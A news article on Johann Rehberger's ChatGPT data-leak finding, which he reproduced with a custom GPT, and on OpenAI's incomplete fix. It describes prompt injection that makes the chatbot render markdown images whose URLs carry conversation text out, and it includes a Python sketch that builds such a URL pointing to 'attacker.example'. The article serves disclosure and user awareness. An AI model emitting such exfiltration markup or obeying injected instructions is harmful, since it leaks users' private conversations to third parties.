We've said it before, and we'll say it again: Don't input anything into ChatGPT that you don't want unauthorized parties to read.
Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could've been weaponized or manipulated by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can still persist.
According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users' data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user's ID and session information.
However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI's fix. In essence, the security flaw still exists.
Rehberger was able to take advantage of OpenAI's recently released and much-lauded custom GPTs feature to create his own GPT, which exfiltrated data from ChatGPT. This is a significant finding, as custom GPTs are being marketed as AI apps, much the way the App Store turned the iPhone into a platform for mobile applications. If Rehberger could build such a custom GPT, bad actors could likely discover the flaw too and create custom GPTs to steal data from their targets.
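Rehberger has publicly described this class of attack as relying on markdown image rendering: injected instructions get the chatbot to emit a markdown image whose URL smuggles conversation text to an attacker-controlled server, which logs the request. The sketch below, which is an illustration and not Rehberger's actual payload (the host name and query parameter are hypothetical), shows how such an exfiltration URL could be assembled:

```python
from urllib.parse import quote

def exfil_markdown(conversation_snippet: str, attacker_host: str) -> str:
    """Build a markdown image tag that leaks text via its URL.

    When a client renders this markdown, it fetches the image URL,
    delivering the encoded snippet to the attacker's server logs.
    """
    # URL-encode the stolen text so it survives as a query parameter
    payload = quote(conversation_snippet)
    return f"![](https://{attacker_host}/log?q={payload})"

# Example: a snippet of conversation data smuggled out in an image URL
tag = exfil_markdown("user: my password is hunter2", "attacker.example")
print(tag)
```

OpenAI's server-side fix reportedly validates such URLs before the client renders them, which is why Rehberger found the leak slowed but not fully closed.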
Rehberger says he first contacted OpenAI about the "data exfiltration technique" back in April. He contacted OpenAI again in November to report exactly how he was able to create a custom GPT and carry out the process.
On Wednesday, Rehberger posted an update to his website: OpenAI had patched the leak vulnerability.
"The fix is not perfect, but a step into the right direction," Rehberger explained.
The fix isn't perfect because ChatGPT can still be tricked into sending data through the vulnerability Rehberger discovered.
"Some quick tests show that bits of info can steal [sic] leak," Rehberger wrote, further explaining that "it only leaks small amounts this way, is slow and more noticeable to a user." Regardless of the remaining issues, Rehberger said it's a "step in the right direction for sure."
But the security flaw remains entirely unpatched in the ChatGPT apps for iOS and Android, which have yet to receive the fix.
ChatGPT users should remain vigilant when using custom GPTs and should probably pass on AI apps from unknown third parties.